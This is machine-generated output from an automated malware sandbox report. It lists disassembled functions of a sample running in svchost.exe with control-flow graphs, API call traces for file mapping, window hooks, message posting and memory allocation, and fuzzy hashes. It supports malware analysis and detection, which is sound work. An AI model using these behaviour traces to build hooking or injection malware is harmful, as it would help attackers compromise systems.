                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000000,0000004A,00000001,0000C209,00000001,0000C208,00000001,0000C20A,00000001,0000C207,00000001,00000000,03E3B1E5), ref: 03E3B159
                                                                                                                                                                    • GetCurrentProcessId.KERNEL32(00000000,00000000,0000004A,00000001,0000C209,00000001,0000C208,00000001,0000C20A,00000001,0000C207,00000001,00000000,03E3B1E5), ref: 03E3B16E
                                                                                                                                                                    • PostMessageA.USER32(?,0000C20B,00000000,00000000), ref: 03E3B187
                                                                                                                                                                    • GetCurrentProcessId.KERNEL32(00000000,00000000,03E3B1E5), ref: 03E3B1A7
                                                                                                                                                                    • PostMessageA.USER32(?,0000C20C,00000000,00000000), ref: 03E3B1C0
                                                                                                                                                                      • Part of subcall function 03E38214: GetModuleFileNameA.KERNEL32(00000000,?,00000105,?,?,03E3B08F,00000000,03E3B1E5), ref: 03E3822B
                                                                                                                                                                      • Part of subcall function 03E39B94: OpenFileMappingA.KERNEL32(00000006,00000000,00000000), ref: 03E39BAF
                                                                                                                                                                      • Part of subcall function 03E39B94: OpenFileMappingA.KERNEL32(00000004,00000000,00000000), ref: 03E39BCC
                                                                                                                                                                      • Part of subcall function 03E39B94: GetLastError.KERNEL32(?,?,03E3B0B4,00000000,03E3B1E5), ref: 03E39BDF
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000002A.00000002.20538811069.0000000003E31000.00000020.00000001.01000000.0000000A.sdmp, Offset: 03E30000, based on PE: true
                                                                                                                                                                    • Associated: 0000002A.00000002.20538750796.0000000003E30000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002A.00000002.20538871728.0000000003E3C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002A.00000002.20538938090.0000000003E3F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_42_2_3e30000_svchost.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CurrentFileProcess$MappingMessageModuleOpenPostRead$ErrorHandleLastName
                                                                                                                                                                    • String ID: iexplore.exe
                                                                                                                                                                    • API String ID: 3641758393-3286091477
                                                                                                                                                                    • Opcode ID: 52e32979198605c7c946ea97b6920a70de89d200ee60c6a32a10fd332e1806a7
                                                                                                                                                                    • Instruction ID: 90adf319c057bca9e01d0155c6122fdb93f864de824287b644fd7449e8fe0965
                                                                                                                                                                    • Opcode Fuzzy Hash: 52e32979198605c7c946ea97b6920a70de89d200ee60c6a32a10fd332e1806a7
                                                                                                                                                                    • Instruction Fuzzy Hash: 88413B346043199FD701EBA9C88DFA9B7F5AF4A304F506690E402EF395D775E944CB21
                                                                                                                                                                    Function 03E39B94 Relevance: 9.1, APIs: 6, Instructions: 52fileCOMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    APIs
                                                                                                                                                                    • OpenFileMappingA.KERNEL32(00000006,00000000,00000000), ref: 03E39BAF
                                                                                                                                                                    • OpenFileMappingA.KERNEL32(00000004,00000000,00000000), ref: 03E39BCC
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,03E3B0B4,00000000,03E3B1E5), ref: 03E39BDF
                                                                                                                                                                    • MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000074,?,?,03E3B0B4,00000000,03E3B1E5), ref: 03E39BF9
                                                                                                                                                                    • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000074,00000000,00000006,00000000,00000000,00000074,?,?,03E3B0B4,00000000,03E3B1E5), ref: 03E39C1A
                                                                                                                                                                    • GetLastError.KERNEL32(00000000,00000006,00000000,00000000,00000074,?,?,03E3B0B4,00000000,03E3B1E5), ref: 03E39C2D
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000002A.00000002.20538811069.0000000003E31000.00000020.00000001.01000000.0000000A.sdmp, Offset: 03E30000, based on PE: true
                                                                                                                                                                    • Associated: 0000002A.00000002.20538750796.0000000003E30000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002A.00000002.20538871728.0000000003E3C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002A.00000002.20538938090.0000000003E3F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_42_2_3e30000_svchost.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: File$ErrorLastMappingOpenView
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3772272286-0
                                                                                                                                                                    • Opcode ID: 955202bbdf9164031bfcbaa687810c085dfa0075709cc7b9fe6902ae6864e669
                                                                                                                                                                    • Instruction ID: 9d5a6f2857757f7b8aeb8be148303497c667ebca04b670841a5710fa7b36e006
                                                                                                                                                                    • Opcode Fuzzy Hash: 955202bbdf9164031bfcbaa687810c085dfa0075709cc7b9fe6902ae6864e669
                                                                                                                                                                    • Instruction Fuzzy Hash: 55110374985368EAE710FB76AD4DB96B7E8E706714F182794E2825F2D5C7B43080CB14
                                                                                                                                                                    Function 03E39DC8 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 31windowCOMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 610 3e39dc8-3e39ded call 3e39c74 613 3e39e18-3e39e1e 610->613 614 3e39def-3e39e0c PostMessageA 610->614 614->613 615 3e39e0e-3e39e13 call 3e39e3c 614->615 615->613
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 03E39C74: LoadLibraryA.KERNEL32(kernel32.dll,?), ref: 03E39CA7
                                                                                                                                                                      • Part of subcall function 03E39C74: GetProcAddress.KERNEL32(76680000,GetProcAddress), ref: 03E39CBC
                                                                                                                                                                      • Part of subcall function 03E39C74: LoadLibraryA.KERNEL32(user32.dll,?), ref: 03E39CD4
                                                                                                                                                                      • Part of subcall function 03E39C74: GetProcAddress.KERNEL32(767A0000,00000000), ref: 03E39CF6
                                                                                                                                                                    • PostMessageA.USER32(?,?,?,?), ref: 03E39DFF
                                                                                                                                                                      • Part of subcall function 03E39E3C: GetCurrentProcessId.KERNEL32(03E39DA2,?,?,03E39DA2), ref: 03E39E63
                                                                                                                                                                      • Part of subcall function 03E39E3C: PostMessageA.USER32(?,?,00000000,03E39DA2), ref: 03E39E7B
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000002A.00000002.20538811069.0000000003E31000.00000020.00000001.01000000.0000000A.sdmp, Offset: 03E30000, based on PE: true
                                                                                                                                                                    • Associated: 0000002A.00000002.20538750796.0000000003E30000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002A.00000002.20538871728.0000000003E3C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002A.00000002.20538938090.0000000003E3F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_42_2_3e30000_svchost.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AddressLibraryLoadMessagePostProc$CurrentProcess
                                                                                                                                                                    • String ID: PostMessageA
                                                                                                                                                                    • API String ID: 3249817243-3140657398
                                                                                                                                                                    • Opcode ID: 1801b1fcd2227f6a76ff77341ef58b8fb4d8c986810065f0b9208045262a75ad
                                                                                                                                                                    • Instruction ID: 4f4b2d3ffbcbb2dfbf5db0aabf88008aa430137904cf40fc1a074618801ca8a5
                                                                                                                                                                    • Opcode Fuzzy Hash: 1801b1fcd2227f6a76ff77341ef58b8fb4d8c986810065f0b9208045262a75ad
                                                                                                                                                                    • Instruction Fuzzy Hash: DEF017B5E0121CAFCB00DFE9C848B9EB7F8AB0A200F1097A5B818E7341D3709A10CB91
                                                                                                                                                                    Function 03E39F0C Relevance: 3.1, APIs: 2, Instructions: 107COMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 617 3e39f0c-3e39f1d 618 3e39f40-3e39f53 CallNextHookEx 617->618 619 3e39f1f-3e39f3e CallNextHookEx 617->619 620 3e39f56-3e39f6c 618->620 619->620 621 3e39f72-3e39f7d 620->621 622 3e3a026-3e3a05c 620->622 621->622 623 3e39f83-3e39f8a call 3e399e0 621->623 623->622 627 3e39f90-3e39f94 623->627 628 3e39f96-3e39f99 627->628 629 3e39fd4-3e39ffb call 3e39d40 627->629 631 3e3a006-3e3a021 call 3e39dc8 628->631 632 3e39f9b-3e39f9c 628->632 629->622 637 3e39ffd-3e3a004 629->637 631->622 632->622 633 3e39fa2-3e39fc9 call 3e39d40 632->633 633->622 639 3e39fcb-3e39fd2 633->639 637->622 639->622
                                                                                                                                                                    APIs
                                                                                                                                                                    • CallNextHookEx.USER32(?,?,?,?), ref: 03E39F36
                                                                                                                                                                    • CallNextHookEx.USER32(00000000,?,?,?), ref: 03E39F4E
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000002A.00000002.20538811069.0000000003E31000.00000020.00000001.01000000.0000000A.sdmp, Offset: 03E30000, based on PE: true
                                                                                                                                                                    • Associated: 0000002A.00000002.20538750796.0000000003E30000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002A.00000002.20538871728.0000000003E3C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002A.00000002.20538938090.0000000003E3F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_42_2_3e30000_svchost.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CallHookNext
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3378577984-0
                                                                                                                                                                    • Opcode ID: 23079eb4f0857048dd1b01a3ae1688861f1f9dbc1f5d4091a044a42897bda297
                                                                                                                                                                    • Instruction ID: b5e366564f323c351643d1b7519a08d3ebf7ce8602ce7b5476ded2fff8d4f7f2
                                                                                                                                                                    • Opcode Fuzzy Hash: 23079eb4f0857048dd1b01a3ae1688861f1f9dbc1f5d4091a044a42897bda297
                                                                                                                                                                    • Instruction Fuzzy Hash: 7D41F039204208EFDB10DF59E989EA973F9EB0A310F2492A1F905DB3A1D772E940CF10
                                                                                                                                                                    Function 03E31444 Relevance: 2.5, APIs: 2, Instructions: 37memoryCOMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 640 3e31444-3e31451 641 3e31453-3e31458 640->641 642 3e3145a-3e31460 640->642 643 3e31466-3e3147e VirtualAlloc 641->643 642->643 644 3e314a3-3e314a6 643->644 645 3e31480-3e31487 call 3e31268 643->645 647 3e3148c-3e3148e 645->647 647->644 648 3e31490-3e314a1 VirtualFree 647->648 648->644
                                                                                                                                                                    APIs
                                                                                                                                                                    • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,03E317D7), ref: 03E31473
                                                                                                                                                                    • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,03E317D7), ref: 03E3149A
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000002A.00000002.20538811069.0000000003E31000.00000020.00000001.01000000.0000000A.sdmp, Offset: 03E30000, based on PE: true
                                                                                                                                                                    • Associated: 0000002A.00000002.20538750796.0000000003E30000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002A.00000002.20538871728.0000000003E3C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002A.00000002.20538938090.0000000003E3F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_42_2_3e30000_svchost.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Virtual$AllocFree
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2087232378-0
                                                                                                                                                                    • Opcode ID: 7bd40d97718a99176df0b2e4246046c8d9648a9c55502e0767320f63f5d8f3e5
                                                                                                                                                                    • Instruction ID: 6b027bd1f4a72286e53f060f334b72aa16e4232007e5c2ffe7824b42510e413c
                                                                                                                                                                    • Opcode Fuzzy Hash: 7bd40d97718a99176df0b2e4246046c8d9648a9c55502e0767320f63f5d8f3e5
                                                                                                                                                                    • Instruction Fuzzy Hash: 65F0AE76F007305ADB20F5694C88B9255989F877A1F155379FD4CEF3C8D6914801C291
                                                                                                                                                                    Function 03E34344 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 649 3e34344-3e34352 650 3e34354-3e3436b GetModuleFileNameA call 3e345d8 649->650 651 3e3437f-3e3438a 649->651 653 3e34370-3e34377 650->653 653->651 654 3e34379-3e3437c 653->654 654->651
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 03E34362
                                                                                                                                                                      • Part of subcall function 03E345D8: GetModuleFileNameA.KERNEL32(00000000,?,00000105), ref: 03E345F3
                                                                                                                                                                      • Part of subcall function 03E345D8: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 03E34611
                                                                                                                                                                      • Part of subcall function 03E345D8: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 03E3462F
                                                                                                                                                                      • Part of subcall function 03E345D8: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 03E3464D
                                                                                                                                                                      • Part of subcall function 03E345D8: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000005,00000000,03E346DC,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 03E34696
                                                                                                                                                                      • Part of subcall function 03E345D8: RegQueryValueExA.ADVAPI32(?,03E34858,00000000,00000000,00000000,00000005,?,?,00000000,00000000,00000000,00000005,00000000,03E346DC,?,80000001), ref: 03E346B4
                                                                                                                                                                      • Part of subcall function 03E345D8: RegCloseKey.ADVAPI32(?,03E346E3,00000000,00000000,00000005,00000000,03E346DC,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 03E346D6
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000002A.00000002.20538811069.0000000003E31000.00000020.00000001.01000000.0000000A.sdmp, Offset: 03E30000, based on PE: true
                                                                                                                                                                    • Associated: 0000002A.00000002.20538750796.0000000003E30000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002A.00000002.20538871728.0000000003E3C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002A.00000002.20538938090.0000000003E3F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_42_2_3e30000_svchost.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Open$FileModuleNameQueryValue$Close
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2796650324-0
                                                                                                                                                                    • Opcode ID: b9ed812b69cee5904544981c8a276fdea97e1d4f68b1c6b151a69c22f1966d38
                                                                                                                                                                    • Instruction ID: 3450363c493d8949796b4ef407379a7f4eeda095969460ade8ce891817312e4a
                                                                                                                                                                    • Opcode Fuzzy Hash: b9ed812b69cee5904544981c8a276fdea97e1d4f68b1c6b151a69c22f1966d38
                                                                                                                                                                    • Instruction Fuzzy Hash: 80E06D71A003149BCB10EE6C88C8A8637E8AF0A654F441695ECA8DF28AD771DA208BD1
                                                                                                                                                                    Function 03E34C6C Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 655 3e34c6c-3e34c73 656 3e34c75-3e34c81 call 3e34c44 655->656 657 3e34c8e 655->657 656->657 660 3e34c83-3e34c89 TlsFree 656->660 660->657
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 03E34C44: TlsGetValue.KERNEL32(00000019), ref: 03E34C5C
                                                                                                                                                                      • Part of subcall function 03E34C44: LocalFree.KERNEL32(00000000,00000019), ref: 03E34C66
                                                                                                                                                                    • TlsFree.KERNEL32(00000019), ref: 03E34C89
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000002A.00000002.20538811069.0000000003E31000.00000020.00000001.01000000.0000000A.sdmp, Offset: 03E30000, based on PE: true
                                                                                                                                                                    • Associated: 0000002A.00000002.20538750796.0000000003E30000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002A.00000002.20538871728.0000000003E3C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002A.00000002.20538938090.0000000003E3F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_42_2_3e30000_svchost.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Free$LocalValue
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2967491550-0
                                                                                                                                                                    • Opcode ID: 317b95b1e54e18857ba3a23599b080fd9b787d8c0319187105ee354fab0f6581
                                                                                                                                                                    • Instruction ID: 52184413215f6b7ed499a82286d8f7ad8a09be7b9185fe6498bcf640ee74b51d
                                                                                                                                                                    • Opcode Fuzzy Hash: 317b95b1e54e18857ba3a23599b080fd9b787d8c0319187105ee354fab0f6581
                                                                                                                                                                    • Instruction Fuzzy Hash: 10C04C2410036596FF24F6BB950C77571B86702225B69A3146460D71D4DA74C405CF26
                                                                                                                                                                    Function 03E315E8 Relevance: 1.3, APIs: 1, Instructions: 71memoryCOMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 661 3e315e8-3e31639 662 3e31696-3e3169d 661->662 663 3e3163b-3e31652 662->663 664 3e3169f-3e316a6 662->664 665 3e31654-3e31658 663->665 666 3e3165a-3e31661 663->666 665->666 667 3e31663-3e31667 666->667 668 3e3166a-3e3166f 666->668 667->668 669 3e31671-3e31688 VirtualAlloc 668->669 670 3e31690-3e31694 668->670 669->670 671 3e3168a-3e3168e 669->671 670->662 671->664
                                                                                                                                                                    APIs
                                                                                                                                                                    • VirtualAlloc.KERNEL32(?,?,00001000,00000004), ref: 03E31681
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000002A.00000002.20538811069.0000000003E31000.00000020.00000001.01000000.0000000A.sdmp, Offset: 03E30000, based on PE: true
                                                                                                                                                                    • Associated: 0000002A.00000002.20538750796.0000000003E30000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002A.00000002.20538871728.0000000003E3C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002A.00000002.20538938090.0000000003E3F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_42_2_3e30000_svchost.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AllocVirtual
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 4275171209-0
                                                                                                                                                                    • Opcode ID: bf81a38576182df7ebedf42f44557afe8dfb248d6b9567118f4a5f62bd21eef2
                                                                                                                                                                    • Instruction ID: 15a242daeecabba9c9b6c4620c09e0ce261fcfed26f05f326f864b721a90a25a
                                                                                                                                                                    • Opcode Fuzzy Hash: bf81a38576182df7ebedf42f44557afe8dfb248d6b9567118f4a5f62bd21eef2
                                                                                                                                                                    • Instruction Fuzzy Hash: CA21CDB464424ADFC750DF6CC884A9AB7F4FF89354B188A69F998CB344D330E954CB52
                                                                                                                                                                    Function 03E31520 Relevance: 1.3, APIs: 1, Instructions: 69COMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 672 3e31520-3e3154c 673 3e315b9-3e315c0 672->673 674 3e315c2-3e315cb 673->674 675 3e3154e-3e3155f 673->675 676 3e315de-3e315e5 674->676 677 3e315cd-3e315db 674->677 678 3e315b3-3e315b7 675->678 679 3e31561-3e3156c 675->679 677->676 678->673 679->678 680 3e3156e-3e31572 679->680 681 3e31574 680->681 682 3e31578-3e31586 680->682 681->682 683 3e31588 682->683 684 3e3158c-3e315a0 VirtualFree 682->684 683->684 685 3e315a2 684->685 686 3e315ac-3e315ae call 3e312c4 684->686 685->686 686->678
                                                                                                                                                                    APIs
                                                                                                                                                                    • VirtualFree.KERNEL32(0000000C,00000000,00008000), ref: 03E31599
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000002A.00000002.20538811069.0000000003E31000.00000020.00000001.01000000.0000000A.sdmp, Offset: 03E30000, based on PE: true
                                                                                                                                                                    • Associated: 0000002A.00000002.20538750796.0000000003E30000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002A.00000002.20538871728.0000000003E3C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002A.00000002.20538938090.0000000003E3F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_42_2_3e30000_svchost.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: FreeVirtual
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1263568516-0
                                                                                                                                                                    • Opcode ID: 9c42a345a70f0f3a1d6e030862cb05aa359eaaec3674c58177a49df2bd4ecf9d
                                                                                                                                                                    • Instruction ID: 205db704243e856ae12d9a062ae26ee13aa184b55acd6f76f601bf270d85accf
                                                                                                                                                                    • Opcode Fuzzy Hash: 9c42a345a70f0f3a1d6e030862cb05aa359eaaec3674c58177a49df2bd4ecf9d
                                                                                                                                                                    • Instruction Fuzzy Hash: CF21BF74604306AFC710EF19D888A4ABBE4FF89364F248A6DE59987350D331E850CB56
                                                                                                                                                                    Function 03E316A8 Relevance: 1.3, APIs: 1, Instructions: 67COMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 688 3e316a8-3e316f7 689 3e31751-3e31758 688->689 690 3e3175a-3e31761 689->690 691 3e316f9-3e3170f 689->691 692 3e31711-3e31715 691->692 693 3e31717-3e3171d 691->693 692->693 694 3e31725-3e31729 693->694 695 3e3171f-3e31723 693->695 696 3e3174b-3e3174f 694->696 697 3e3172b-3e3173f VirtualFree 694->697 695->694 696->689 697->696 698 3e31741 697->698 698->696
                                                                                                                                                                    APIs
                                                                                                                                                                    • VirtualFree.KERNEL32(?,?,00004000), ref: 03E31738
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000002A.00000002.20538811069.0000000003E31000.00000020.00000001.01000000.0000000A.sdmp, Offset: 03E30000, based on PE: true
                                                                                                                                                                    • Associated: 0000002A.00000002.20538750796.0000000003E30000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002A.00000002.20538871728.0000000003E3C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002A.00000002.20538938090.0000000003E3F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_42_2_3e30000_svchost.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: FreeVirtual
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1263568516-0
                                                                                                                                                                    • Opcode ID: cddb50e74585b9630ee5e4e1119c29ccb3fce7b7018b50d9fa9e43f0702cbc30
                                                                                                                                                                    • Instruction ID: 0bf466703fd808e11e570db5f3c101d574df32e643fc97db47eebb45ffea732d
                                                                                                                                                                    • Opcode Fuzzy Hash: cddb50e74585b9630ee5e4e1119c29ccb3fce7b7018b50d9fa9e43f0702cbc30
                                                                                                                                                                    • Instruction Fuzzy Hash: E421E0B5204206DFC710DF2CD888A5AB7F4FF8A354B284A69E594CB344E331E905CB52
                                                                                                                                                                    Function 03E311DC Relevance: 1.3, APIs: 1, Instructions: 44memoryCOMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 699 3e311dc-3e311e8 700 3e31243-3e31255 699->700 701 3e311ea-3e311ff LocalAlloc 699->701 702 3e31258-3e3125f 700->702 703 3e31201-3e31206 701->703 704 3e31208-3e3121d 701->704 703->702 705 3e3121f-3e31241 704->705 705->700 705->705
                                                                                                                                                                    APIs
                                                                                                                                                                    • LocalAlloc.KERNEL32(00000000,00000644), ref: 03E311F1
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000002A.00000002.20538811069.0000000003E31000.00000020.00000001.01000000.0000000A.sdmp, Offset: 03E30000, based on PE: true
                                                                                                                                                                    • Associated: 0000002A.00000002.20538750796.0000000003E30000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002A.00000002.20538871728.0000000003E3C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002A.00000002.20538938090.0000000003E3F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_42_2_3e30000_svchost.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AllocLocal
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3494564517-0
                                                                                                                                                                    • Opcode ID: 6d1d14727c8a201f3abccb770ad968e669a4ed6408b52c1419a830996ba674d9
                                                                                                                                                                    • Instruction ID: fdfbcc47337ca7e1c698e32404fd5f1bfcc0770f263669f1d30ee396cc71ec29
                                                                                                                                                                    • Opcode Fuzzy Hash: 6d1d14727c8a201f3abccb770ad968e669a4ed6408b52c1419a830996ba674d9
                                                                                                                                                                    • Instruction Fuzzy Hash: AD11B374608751EFC710EF28C484B1AB7E1AF8A714F10CA6DE899CB364E730A841DB02

                                                                                                                                                                    Non-executed Functions

                                                                                                                                                                    Function 03E34400 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 144stringlibraryfileCOMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 767 3e34400-3e34426 GetModuleHandleA 768 3e34428-3e3443a GetProcAddress 767->768 769 3e3446c-3e34472 767->769 768->769 770 3e3443c-3e34451 768->770 771 3e344b5-3e344bb 769->771 772 3e34474-3e3447b 769->772 770->769 779 3e34453-3e34467 lstrcpyn 770->779 773 3e344be-3e344d8 lstrcpyn 771->773 774 3e34481-3e34495 call 3e343d4 772->774 775 3e345a8-3e345b1 772->775 776 3e34588-3e3458e 773->776 774->775 784 3e3449b-3e344ad call 3e343d4 774->784 780 3e34594-3e345a3 lstrcpyn 776->780 781 3e344dd-3e344f9 call 3e343d4 776->781 779->775 780->775 781->775 787 3e344ff-3e3452b lstrcpyn FindFirstFileA 781->787 784->775 790 3e344b3 784->790 787->775 789 3e3452d-3e3454a FindClose lstrlen 787->789 789->775 791 3e3454c-3e34585 lstrcpyn lstrlen 789->791 790->773 791->776
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 03E3441D
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetLongPathNameA), ref: 03E3442E
                                                                                                                                                                    • lstrcpyn.KERNEL32(?,?,?,?,?,kernel32.dll), ref: 03E34462
                                                                                                                                                                    • lstrcpyn.KERNEL32(?,?,?,kernel32.dll), ref: 03E344D3
                                                                                                                                                                    • lstrcpyn.KERNEL32(?,?,?,?,?,?,kernel32.dll), ref: 03E3450E
